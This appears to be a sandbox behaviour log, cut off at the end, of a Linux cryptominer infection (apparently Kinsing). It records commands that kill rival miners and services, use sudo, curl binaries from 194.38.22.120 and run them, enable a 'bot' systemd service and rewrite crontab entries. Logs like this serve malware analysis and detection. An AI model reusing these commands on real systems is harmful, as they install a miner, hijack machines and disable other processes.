/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1451
-
-
/bin/grepgrep exe4⤵PID:1454
-
-
/bin/lsls -latrh /proc/timer_list4⤵PID:1453
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1456
-
-
/bin/grepgrep exe4⤵PID:1459
-
-
/bin/lsls -latrh /proc/tty4⤵PID:1458
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1461
-
-
/bin/grepgrep exe4⤵PID:1464
-
-
/bin/lsls -latrh /proc/uptime4⤵PID:1463
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1466
-
-
/bin/grepgrep exe4⤵PID:1469
-
-
/bin/lsls -latrh /proc/version4⤵PID:1468
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1471
-
-
/bin/grepgrep exe4⤵PID:1474
-
-
/bin/lsls -latrh /proc/vmallocinfo4⤵PID:1473
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1476
-
-
/bin/grepgrep exe4⤵PID:1479
-
-
/bin/lsls -latrh /proc/vmstat4⤵PID:1478
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1481
-
-
/bin/grepgrep exe4⤵PID:1484
-
-
/bin/lsls -latrh /proc/zoneinfo4⤵PID:1483
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1486
-
-
/usr/bin/idid -u4⤵PID:1487
-
-
/usr/bin/sudosudo mkdir /etc/data4⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1488 -
/usr/sbin/sendmailsendmail -t5⤵PID:1491
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOZV-0000O3-Nv6⤵
- Reads CPU attributes
PID:1505
-
-
-
/usr/sbin/sendmailsendmail -t5⤵PID:1494
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOZV-0000O6-OW6⤵
- Reads CPU attributes
PID:1504
-
-
-
/bin/mkdirmkdir /etc/data5⤵PID:1495
-
-
-
/usr/bin/idid -u4⤵PID:1496
-
-
/bin/unameuname -i4⤵
- Attempts to change immutable files
PID:1497
-
-
/bin/unameuname -m4⤵PID:1498
-
-
/bin/lsls -la /etc/data4⤵PID:1500
-
-
/bin/grepgrep -e /dev4⤵PID:1501
-
-
/bin/grepgrep -v grep4⤵PID:1502
-
-
/usr/bin/pkillpkill -f sshd4⤵
- Reads CPU attributes
PID:1503
-
-
/usr/bin/pkillpkill -f htop4⤵
- Reads CPU attributes
PID:1506
-
-
/usr/bin/pkillpkill -f linuxsys4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1508
-
-
/usr/bin/pkillpkill -f kthreaddo4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1509
-
-
/usr/bin/pkillpkill -f donkey4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1510
-
-
/usr/bin/pkillpkill -f sysupdater4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1511
-
-
/usr/bin/pkillpkill -f php-update.service4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1514
-
-
/usr/bin/pkillpkill -f update-setup4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1515
-
-
/bin/grepgrep :14144⤵PID:1517
-
-
/bin/grepgrep -v -4⤵PID:1520
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1521
-
-
/usr/bin/awkawk "{print \$7}"4⤵PID:1518
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"4⤵PID:1519
-
-
/bin/grepgrep -v grep4⤵PID:1524
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:1525
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1526
-
-
/bin/grepgrep rtw88_pcied4⤵PID:1523
-
-
/bin/psps ax4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1522
-
-
/bin/grepgrep -v grep4⤵PID:1529
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:1530
-
-
/bin/grepgrep stratum4⤵PID:1528
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1531
-
-
/bin/psps ax4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1527
-
-
/bin/grepgrep -v grep4⤵PID:1534
-
-
/bin/grepgrep Sofia4⤵PID:1533
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:1535
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1536
-
-
/bin/psps ax4⤵
- Reads CPU attributes
PID:1532
-
-
/usr/bin/pkillpkill -f Sofia4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1537
-
-
/bin/grepgrep -v grep4⤵PID:1540
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1541
-
-
/bin/grepgrep tracepath4⤵PID:1539
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1542
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1538
-
-
/bin/grepgrep -v grep4⤵PID:1545
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1546
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1547
-
-
/bin/grepgrep /dot4⤵PID:1544
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1543
-
-
/bin/grepgrep -v grep4⤵PID:1550
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1551
-
-
/bin/grepgrep "php-fpm pool www"4⤵PID:1549
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1552
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
PID:1548
-
-
/bin/grepgrep -v grep4⤵PID:1555
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1556
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1557
-
-
/bin/grepgrep "Cli start accept"4⤵PID:1554
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
PID:1553
-
-
/bin/grepgrep "bash -k"4⤵PID:1559
-
-
/bin/grepgrep -v grep4⤵PID:1560
-
-
/bin/psps aux4⤵
- Process Discovery
- Reads runtime system information
PID:1558
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1561
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1562
-
-
/bin/grepgrep -v grep4⤵PID:1565
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1566
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1567
-
-
/bin/grepgrep perfctl4⤵PID:1564
-
-
/bin/psps aux4⤵
- Process Discovery
- Reads runtime system information
PID:1563
-
-
/usr/bin/pkillpkill -f hezb4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1568
-
-
/usr/bin/pkillpkill -f /tmp/.out4⤵
- Reads CPU attributes
PID:1569
-
-
/bin/grepgrep -v grep4⤵PID:1572
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1573
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1574
-
-
/bin/grepgrep ./ll14⤵PID:1571
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
PID:1570
-
-
/bin/grepgrep -v grep4⤵PID:1577
-
-
/bin/grepgrep agetty4⤵PID:1576
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1575
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"4⤵PID:1578
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1579
-
-
/usr/bin/pkillpkill -f 42.112.28.2164⤵
- Reads CPU attributes
PID:1580
-
-
/usr/bin/awkawk "{print \$7}"4⤵PID:1583
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"4⤵PID:1584
-
-
/bin/grepgrep 207.38.87.64⤵PID:1582
-
-
/bin/grepgrep -v -4⤵PID:1585
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1586
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"4⤵PID:1590
-
-
/usr/bin/awkawk "{print \$7}"4⤵PID:1589
-
-
/bin/grepgrep 23.94.214.1194⤵PID:1588
-
-
/bin/grepgrep -v -4⤵PID:1591
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1592
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"4⤵PID:1596
-
-
/usr/bin/awkawk "{print \$7}"4⤵PID:1595
-
-
/bin/grepgrep -v -4⤵PID:1597
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1598
-
-
/bin/grepgrep 127.0.0.1:520184⤵PID:1594
-
-
/usr/bin/awkawk "{print \$7}"4⤵PID:1601
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"4⤵PID:1602
-
-
/bin/grepgrep 34.81.218.76:94864⤵PID:1600
-
-
/bin/grepgrep -v -4⤵PID:1603
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1604
-
-
/usr/bin/awkawk "{print \$7}"4⤵PID:1607
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"4⤵PID:1608
-
-
/bin/grepgrep 42.112.28.216:94864⤵PID:1606
-
-
/bin/grepgrep -v -4⤵PID:1609
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1610
-
-
/usr/bin/pkillpkill -f .git/kthreaddw4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1611
-
-
/usr/bin/pkillpkill -f 80.211.206.1054⤵
- Reads CPU attributes
PID:1612
-
-
/usr/bin/pkillpkill -f 207.38.87.64⤵
- Reads CPU attributes
- Reads runtime system information
PID:1613
-
-
/usr/bin/pkillpkill -f p84444⤵
- Reads CPU attributes
PID:1614
-
-
/usr/bin/pkillpkill -f supportxmr4⤵
- Reads CPU attributes
PID:1615
-
-
/usr/bin/pkillpkill -f monero4⤵
- Reads CPU attributes
PID:1616
-
-
/usr/bin/pkillpkill -f kthreaddi4⤵
- Reads CPU attributes
PID:1617
-
-
/usr/bin/pkillpkill -f srv004⤵
- Reads CPU attributes
- Reads runtime system information
PID:1618
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae4⤵
- Reads CPU attributes
PID:1619
-
-
/usr/bin/pkillpkill -f .javae4⤵
- Reads CPU attributes
PID:1620
-
-
/usr/bin/pkillpkill -f .syna4⤵
- Reads CPU attributes
PID:1621
-
-
/usr/bin/pkillpkill -f xmm4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1622
-
-
/usr/bin/pkillpkill -f solr.sh4⤵PID:1623
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1624
-
-
/usr/bin/pkillpkill -f /tmp/javac4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1625
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh4⤵
- Reads CPU attributes
PID:1626
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1627
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker4⤵PID:1628
-
-
/usr/bin/pkillpkill -f c3pool4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1629
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh4⤵
- Reads CPU attributes
PID:1630
-
-
/usr/bin/pkillpkill -f /tmp/14⤵
- Reads CPU attributes
- Reads runtime system information
PID:1631
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh4⤵
- Reads CPU attributes
PID:1632
-
-
/usr/bin/pkillpkill -f /tmp/gitaly4⤵
- Reads CPU attributes
PID:1633
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1634
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB4⤵
- Reads CPU attributes
PID:1635
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise4⤵
- Reads CPU attributes
PID:1636
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1637
-
-
/bin/grepgrep -v grep4⤵PID:1640
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1641
-
-
/bin/grepgrep ./udp4⤵PID:1639
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1642
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
PID:1638
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/014⤵
- Attempts to change immutable files
PID:1643
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1645
-
-
/bin/catcat /tmp/.X11-unix/014⤵PID:1644
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/114⤵
- Attempts to change immutable files
PID:1646
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1648
-
-
/bin/catcat /tmp/.X11-unix/114⤵PID:1647
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/224⤵
- Attempts to change immutable files
PID:1649
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1651
-
-
/bin/catcat /tmp/.X11-unix/224⤵PID:1650
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.14⤵
- Attempts to change immutable files
PID:1652
-
-
/bin/catcat /tmp/.systemd.14⤵PID:1653
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1654
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.24⤵
- Attempts to change immutable files
PID:1655
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1657
-
-
/bin/catcat /tmp/.systemd.24⤵PID:1656
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.34⤵
- Attempts to change immutable files
PID:1658
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1660
-
-
/bin/catcat /tmp/.systemd.34⤵PID:1659
-
-
/bin/catcat /tmp/.systemd.14⤵PID:1661
-
-
/bin/catcat /tmp/.systemd.24⤵PID:1662
-
-
/bin/catcat /tmp/.systemd.34⤵PID:1663
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.04⤵
- Attempts to change immutable files
PID:1664
-
-
/bin/catcat /tmp/.pg_stat.04⤵PID:1665
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1666
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.14⤵
- Attempts to change immutable files
PID:1667
-
-
/bin/catcat /tmp/.pg_stat.14⤵PID:1668
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1669
-
-
/bin/sedsed -i "s/^0//" /root/data/./oka.pid4⤵
- Attempts to change immutable files
PID:1670
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1672
-
-
/bin/catcat /root/data/./oka.pid4⤵PID:1671
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d4⤵
- Attempts to change immutable files
PID:1673
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1675
-
-
/bin/catcat /tmp/.ICE-unix/d4⤵PID:1674
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m4⤵
- Attempts to change immutable files
PID:1676
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1678
-
-
/bin/catcat /tmp/.ICE-unix/m4⤵PID:1677
-
-
/usr/bin/pkillpkill -f zsvc4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1679
-
-
/usr/bin/pkillpkill -f pdefenderd4⤵
- Reads runtime system information
PID:1680
-
-
/usr/bin/pkillpkill -f updatecheckerd4⤵
- Reads CPU attributes
PID:1681
-
-
/usr/bin/pkillpkill -f cruner4⤵
- Reads CPU attributes
PID:1682
-
-
/usr/bin/pkillpkill -f dbused4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1683
-
-
/usr/bin/pkillpkill -f bashirc4⤵
- Reads CPU attributes
PID:1684
-
-
/usr/bin/pkillpkill -f meminitsrv4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1685
-
-
/bin/grepgrep -v grep4⤵PID:1688
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1689
-
-
/bin/grepgrep ./oka4⤵PID:1687
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1690
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
PID:1686
-
-
/bin/grepgrep -v grep4⤵PID:1693
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1694
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1695
-
-
/bin/grepgrep "postgres: autovacum"4⤵PID:1692
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1691
-
-
/bin/grepgrep -v bin4⤵PID:1698
-
-
/bin/grepgrep -v "\\["4⤵PID:1699
-
-
/usr/bin/awkawk "length(\$1) == 8"4⤵PID:1697
-
-
/bin/grepgrep -v "("4⤵PID:1700
-
-
/bin/psps ax -o "command,pid" -www4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1696
-
-
/bin/grepgrep -v php-fpm4⤵PID:1701
-
-
/bin/grepgrep -v proxymap4⤵PID:1702
-
-
/bin/grepgrep -v postgres4⤵PID:1703
-
-
/bin/grepgrep -v postgrey4⤵PID:1704
-
-
/bin/grepgrep -v kinsing4⤵PID:1705
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1706
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1707
-
-
/bin/grepgrep -v bin4⤵PID:1710
-
-
/usr/bin/awkawk "length(\$1) == 16"4⤵PID:1709
-
-
/bin/grepgrep -v "\\["4⤵PID:1711
-
-
/bin/grepgrep -v "("4⤵PID:1712
-
-
/bin/psps ax -o "command,pid" -www4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1708
-
-
/bin/grepgrep -v php-fpm4⤵PID:1713
-
-
/bin/grepgrep -v proxymap4⤵PID:1714
-
-
/bin/grepgrep -v postgres4⤵PID:1715
-
-
/bin/grepgrep -v postgrey4⤵PID:1716
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1717
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1718
-
-
/bin/grepgrep -v "\\["4⤵PID:1722
-
-
/bin/grepgrep -v bin4⤵PID:1721
-
-
/usr/bin/awkawk "length(\$5) == 8"4⤵PID:1720
-
-
/bin/grepgrep -v "("4⤵PID:1723
-
-
/bin/grepgrep -v php-fpm4⤵PID:1724
-
-
/bin/psps ax4⤵
- Reads CPU attributes
PID:1719
-
-
/bin/grepgrep -v proxymap4⤵PID:1725
-
-
/bin/grepgrep -v postgres4⤵PID:1726
-
-
/bin/grepgrep -v postgrey4⤵PID:1727
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:1728
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1729
-
-
/bin/grepgrep /tmp/sscks4⤵PID:1732
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1733
-
-
/bin/grepgrep -v grep4⤵PID:1731
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1734
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1730
-
-
/usr/bin/awkawk "{ print \$1 }"4⤵PID:1738
-
-
/usr/bin/md5summd5sum /etc/data/kinsing4⤵PID:1737
-
-
/bin/rmrm -rf /etc/data/kinsing4⤵PID:1739
-
-
/bin/chmodchmod 777 /etc/data/kinsing4⤵
- File and Directory Permissions Modification
PID:1740
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing4⤵PID:1741
-
-
/bin/chmodchmod +x /etc/data/kinsing4⤵
- File and Directory Permissions Modification
PID:1742
-
-
/usr/bin/awkawk "{ print \$1 }"4⤵PID:1746
-
-
/usr/bin/md5summd5sum /etc/data/kinsing4⤵PID:1745
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so4⤵PID:1749
-
-
/usr/bin/awkawk "{ print \$1 }"4⤵PID:1750
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so4⤵
- File and Directory Permissions Modification
PID:1751
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so4⤵PID:1752
-
-
/bin/chmodchmod +x /etc/data/libsystem.so4⤵
- File and Directory Permissions Modification
PID:1753
-
-
/usr/bin/awkawk "{ print \$1 }"4⤵PID:1757
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so4⤵PID:1756
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so4⤵
- File and Directory Permissions Modification
PID:1758
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so4⤵PID:1759
-
-
/bin/chmodchmod +x /etc/data/libsystem.so4⤵
- File and Directory Permissions Modification
PID:1760
-
-
/usr/bin/awkawk "{ print \$1 }"4⤵PID:1764
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so4⤵PID:1763
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi4⤵PID:1765
-
-
/bin/chmodchmod 777 /etc/data/kinsing4⤵
- File and Directory Permissions Modification
PID:1766
-
-
/bin/chmodchmod +x /etc/data/kinsing4⤵
- File and Directory Permissions Modification
PID:1767
-
-
/etc/data/kinsing/etc/data/kinsing4⤵PID:1768
-
-
/usr/bin/idid -u4⤵PID:1770
-
-
/bin/systemctlsystemctl enable bot4⤵
- Enumerates kernel/hardware configuration
PID:1771
-
-
/bin/systemctlsystemctl start bot4⤵
- Enumerates kernel/hardware configuration
PID:1784
-
-
/bin/sedsed /base64/d4⤵PID:1789
-
-
/usr/bin/crontabcrontab -l4⤵PID:1788
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1790
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1793
-
-
/bin/sedsed /_cron/d4⤵PID:1792
-
-
/usr/bin/crontabcrontab -l4⤵PID:1791
-
-
/bin/sedsed /31.210.20.181/d4⤵PID:1795
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1796
-
-
/usr/bin/crontabcrontab -l4⤵PID:1794
-
-
/bin/sedsed /update.sh/d4⤵PID:1798
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1799
-
-
/usr/bin/crontabcrontab -l4⤵PID:1797
-
-
/bin/sedsed /logo4/d4⤵PID:1801
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1802
-
-
/usr/bin/crontabcrontab -l4⤵PID:1800
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1805
-
-
/usr/bin/crontabcrontab -l4⤵PID:1803
-
-
/bin/sedsed /logo9/d4⤵PID:1804
-
-
/bin/sedsed /logo0/d4⤵PID:1807
-
-
/usr/bin/crontabcrontab -l4⤵PID:1806
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1808
-
-
/bin/sedsed /logo/d4⤵PID:1810
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1811
-
-
/usr/bin/crontabcrontab -l4⤵PID:1809
-
-
/bin/sedsed /tor2web/d4⤵PID:1813
-
-
/usr/bin/crontabcrontab -4⤵
